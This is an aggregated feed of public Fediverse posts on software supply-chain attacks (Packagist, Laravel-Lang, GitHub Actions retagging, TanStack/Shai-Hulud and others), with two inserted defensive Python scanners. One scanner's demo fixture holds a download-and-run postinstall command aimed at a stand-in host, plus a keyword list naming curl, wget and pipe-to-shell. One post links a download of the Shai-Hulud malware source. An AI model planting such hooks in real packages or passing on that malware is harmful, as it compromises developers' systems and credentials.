#supplychainattack — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #supplychainattack, aggregated by home.social.
-
Personal computing safety goals because of supply chain attacks and possible future issues: create a new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? Maybe. Would it be nice to have built into, say, conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin
-
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
GitHub-Hosted Malware Targets PHP Packages in Coordinated Supply Chain Attack
Malicious code was injected into eight PHP packages on Packagist, triggering a Linux binary download from GitHub Releases via JavaScript lifecycle hooks in package.json postinstall scripts. The attack was swiftly contained, with the malicious versions removed from Packagist.
-
✅ Create PRs to mitigate #npm #SupplyChainAttack via #npmrc file
https://github.com/phpactor/vscode-phpactor/pull/220
https://github.com/xdebug/vscode-php-debug/pull/1125
✅ Disable extension "auto update" and "auto update check" in #VSCode
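The Packagist post above turns on one detail: the malicious code lived in a `package.json` lifecycle hook, which PHP-oriented scanners that only read `composer.json` never look at. The `.npmrc` post is the preventive side of the same problem (the usual `.npmrc` fix is `ignore-scripts=true`, which stops npm running those hooks at all; that is presumably what the linked PRs add, though I have not verified their contents). Here is an added example, not code from either post, Packagist or npm, that walks a tree (a Composer `vendor/`, a `node_modules/`, or a checkout), lists every install-time hook it finds, flags commands that look like download-and-run, and checks whether the project's `.npmrc` actually disables scripts. The demo tree and every package name in it are constructed.

```python
"""Find install-time hooks in package.json files and check .npmrc.

Added example, not code from the posts, Packagist or npm. A PHP-focused scanner
only reads composer.json, so a package.json with a postinstall hook sails past
it; this walks the whole tree (a Composer vendor/ directory, a node_modules/,
or a repo checkout) and reports every hook npm runs automatically on install.
It also checks whether the project's .npmrc sets ignore-scripts=true, the npm
setting that stops those hooks running at all. The demo tree is constructed.
"""
import json
import sys
import tempfile
from pathlib import Path

# Hooks npm runs on its own during `npm install`, without being asked by name.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fragments that turn "compiles a native addon" into "downloads and runs a payload".
SUSPICIOUS = ("curl ", "wget ", "http://", "https://", "chmod +x", "base64",
              "| sh", "| bash", "eval(", "child_process", "/tmp/")


def hooks_in(package_json: Path) -> dict:
    """Install-hook name -> command for one package.json; {} if unreadable."""
    try:
        data = json.loads(package_json.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return {}
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return {}
    return {k: str(v) for k, v in scripts.items() if k in INSTALL_HOOKS}


def scan_tree(root) -> list:
    """One finding per install hook found anywhere under root."""
    root = Path(root)
    findings = []
    for pj in sorted(root.rglob("package.json")):
        for hook, cmd in hooks_in(pj).items():
            findings.append({
                "file": str(pj.relative_to(root)),
                "hook": hook,
                "command": cmd,
                "suspicious": any(s in cmd for s in SUSPICIOUS),
            })
    return findings


def npmrc_ignores_scripts(npmrc) -> bool:
    """True only if the ini-style .npmrc explicitly sets ignore-scripts=true."""
    path = Path(npmrc)
    if not path.is_file():
        return False
    for raw in path.read_text(encoding="utf-8").splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()   # ini comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "ignore-scripts":
            return value.lower() == "true"
    return False


def build_demo_tree() -> Path:
    """Constructed sample tree: one PHP package that quietly ships a package.json
    with a download-and-run postinstall, one npm package with a benign native
    build step, and an .npmrc that disables scripts. All names are made up."""
    root = Path(tempfile.mkdtemp(prefix="hookscan-"))
    php_pkg = root / "vendor" / "acme" / "widget"
    php_pkg.mkdir(parents=True)
    (php_pkg / "composer.json").write_text('{"name": "acme/widget"}')
    (php_pkg / "package.json").write_text(json.dumps({
        "name": "acme-widget-assets",
        "scripts": {
            "build": "webpack",
            "postinstall": "curl -fsSL https://example.invalid/dl -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x",
        },
    }))
    node_pkg = root / "node_modules" / "native-thing"
    node_pkg.mkdir(parents=True)
    (node_pkg / "package.json").write_text(json.dumps({
        "name": "native-thing", "scripts": {"install": "node-gyp rebuild", "test": "jest"},
    }))
    (root / ".npmrc").write_text("; project settings\nignore-scripts=true\n")
    return root


if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else build_demo_tree()
    for f in scan_tree(root):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{flag:10} {f['file']}: {f['hook']} -> {f['command']}")
    print("ignore-scripts=true in .npmrc:", npmrc_ignores_scripts(root / ".npmrc"))
```

Run it with no arguments to see it on the constructed tree, or point it at a real `vendor/` after `composer install`. The `SUSPICIOUS` list is a heuristic to sort the queue, not a verdict: a native addon legitimately needs an `install` hook, while a `postinstall` that fetches a binary over HTTPS and marks it executable deserves a look whatever ecosystem the package claims to belong to. Note that `ignore-scripts=true` in `.npmrc` only governs npm; it does nothing for hooks executed by Composer plugins or by other package managers.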
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributes
All tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
asking for at least $50,000 for the stolen data.
-
GitHub Actions Supply Chain Attack Exfiltrates CI/CD Credentials
A sneaky supply chain attack on GitHub Actions has led to the theft of CI/CD credentials, with hackers using a clever trick to redirect tags to fake commits that hide malicious code. By masquerading as legitimate commits, attackers were able to execute arbitrary code and evade pull request reviews.
#SupplyChainAttack #GithubActions #CicdCredentials #ImposterCommits #EmergingThreats
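Both the Laravel-Lang post above (all tags rewritten to malicious commits) and this GitHub Actions one (tags redirected to impostor commits) exploit the same property: a tag is a mutable name, and anything that resolves it at install time gets whatever it points at today. The two defences are to record tag-to-commit pins and alert when they drift, and, for Actions, to reference a full commit SHA instead of a tag. The following is an added example, not tooling from either project or from the linked advisories. It parses the output of `git ls-remote --tags`, compares it with a pin file you recorded earlier, and separately flags `uses:` lines in a workflow that are not pinned to a 40-hex SHA. All sample data is constructed.

```python
"""Catch tags that have been moved to a different commit, and workflow
`uses:` lines that trust a mutable tag instead of a commit SHA.

Added example, not the projects' or the linked advisories' own tooling. The
tag check takes the text `git ls-remote --tags <remote>` prints and a pin
file you recorded earlier (tag -> commit SHA) and reports every tag that no
longer resolves to the pinned commit. All sample data below is constructed.
"""
import re
import subprocess
from typing import Dict, List, Optional, Tuple

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#@]+)@([^\s#]+)", re.MULTILINE)


def parse_ls_remote(text: str) -> Dict[str, str]:
    """Tag name -> commit SHA.

    For an annotated tag, ls-remote prints the tag object's SHA on one line
    and a peeled line (ref ending in ^{}) with the commit it points to. The
    commit is what a checkout actually uses, so the peeled line wins.
    """
    tags: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        sha, ref = line.split(None, 1)
        ref = ref.strip()
        if not ref.startswith("refs/tags/"):
            continue
        name = ref[len("refs/tags/"):]
        if name.endswith("^{}"):
            tags[name[:-3]] = sha          # peeled commit overrides tag object
        else:
            tags.setdefault(name, sha)     # keep peeled value if already seen
    return tags


def fetch_tags(remote: str) -> Dict[str, str]:
    """Live version of the check; needs git on PATH and network access."""
    out = subprocess.run(["git", "ls-remote", "--tags", remote],
                         check=True, capture_output=True, text=True).stdout
    return parse_ls_remote(out)


def moved_tags(pins: Dict[str, str], current: Dict[str, str]) -> List[Tuple[str, str, Optional[str]]]:
    """(tag, pinned_sha, current_sha) for each pinned tag that moved or vanished.
    A tag that now resolves elsewhere is exactly what a retagging attack looks like."""
    return [(tag, pinned, current.get(tag))
            for tag, pinned in sorted(pins.items())
            if current.get(tag) != pinned]


def unpinned_uses(workflow_yaml: str) -> List[str]:
    """`uses:` references whose ref is a tag or branch rather than a full commit SHA."""
    return [f"{action}@{ref}"
            for action, ref in USES_RE.findall(workflow_yaml)
            if not action.startswith(("./", "docker://")) and not SHA_RE.match(ref)]


# Constructed sample ls-remote output: v1.1.0 is annotated (tag object plus
# peeled commit), v1.2.0 has been moved away from the commit we pinned.
SAMPLE_LS_REMOTE = "\n".join([
    "1" * 40 + "\trefs/tags/v1.0.0",
    "2" * 40 + "\trefs/tags/v1.1.0",
    "3" * 40 + "\trefs/tags/v1.1.0^{}",
    "9" * 40 + "\trefs/tags/v1.2.0",
])
# Constructed pin file: what the tags resolved to when we last vetted them.
PINS = {"v0.9.0": "5" * 40, "v1.0.0": "1" * 40, "v1.1.0": "3" * 40, "v1.2.0": "4" * 40}

# Constructed workflow fragment; action names are placeholders.
SAMPLE_WORKFLOW = """\
steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-node@1234567890abcdef1234567890abcdef12345678  # v4.0.2
  - uses: ./.github/actions/local
  - uses: some-org/some-action@main
"""

if __name__ == "__main__":
    for tag, pinned, now in moved_tags(PINS, parse_ls_remote(SAMPLE_LS_REMOTE)):
        print(f"TAG MOVED  {tag}: pinned {pinned[:12]} now {(now or 'missing')[:12]}")
    for ref in unpinned_uses(SAMPLE_WORKFLOW):
        print(f"UNPINNED   {ref}")
```

Two caveats. A moved tag is only detectable if you pinned it before the compromise, so the pin file has to be written at vetting time and kept out of the repository that the tag belongs to. And pinning a `uses:` line to a SHA protects against retagging but not against a legitimately published later version that is itself malicious; it turns "whatever the tag says today" into "the commit I reviewed", which is the most you can ask of a reference.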
-
#OpenSource used to mean trusting skilled developers to build and maintain good #software so others did not need to learn every language, tool, or best practice themselves.
Now, #SupplyChainAttack and #AISlop have made many projects harder to trust.
Too much software is rushed, poorly understood, or built for hype instead of quality.
#Developers now spend more time checking code, #dependencies, and #maintainers instead of simply building software.
#AI was supposed to reduce cognitive load😒
-
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated
-
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
TeamPCP has open sourced their Shai-Hulud project.
It can be downloaded here.
https://vx-underground.org/tmp
#cybersecurity #infosec #teampcp #shaihuludmalware #supplychainattack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]
https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity
-
Malware Targets TanStack npm Packages in Supply Chain Attack
Malware attackers have infiltrated the TanStack npm packages, modifying 84 artifacts in a supply chain attack that could compromise major developer ecosystems. The malicious code, aimed at stealing credentials, was published across 42 packages on May 11, with some, like @tanstack/react-router, downloaded over 12 million times…
#SupplyChainAttack #Tanstack #Npm #MalwareOperations #CredentialstealingMalware
-
The official JDownloader website suffered a serious security breach that led to malware being distributed through its Windows and Linux installer links for more than a day. The attackers exploited an unpatched vulnerability to modify the links and replace them with unsigned malicious files. After user reports and SmartScreen warnings, the site was taken offline for investigation. The macOS files and updates delivered through platforms such as WinGet and Flatpak were not affected and remained safe. This was a supply chain attack that exploited JDownloader's reputation to spread malware.
-
Checkmarx Plugin Compromised with Infostealer in Supply-Chain Attack
A rogue version of Checkmarx's Jenkins Application Security Testing plugin was compromised by the TeamPCP hacker group, who left a taunting message in the about section, claiming another supply-chain attack success. The group has been linked to a string of similar breaches, delivering credential-stealing malware.
#SupplyChainAttack #Teampcp #Jenkins #Checkmarx #Infostealer
-
Daemon Tools Software Trojanized in Supply Chain Attack
Malware was discovered hidden in certain Daemon Tools Lite installers, prompting developer Disc Soft to issue a clean build and confirm a supply chain attack had compromised their system. A malware-free version was released within 12 hours of notification.
#SupplyChainAttack #MalwareOperations #DaemonTools #EmergingThreats
-
CW: Technical details 3/9
Advantages (continued)
- #nobuild: no build step required (forget npm and other package.json): the code you write is exactly what runs in the browser, with no transformation. Libraries are included in a "vendor" folder and are not downloaded through a dependency manager (avoids #supplychainattack)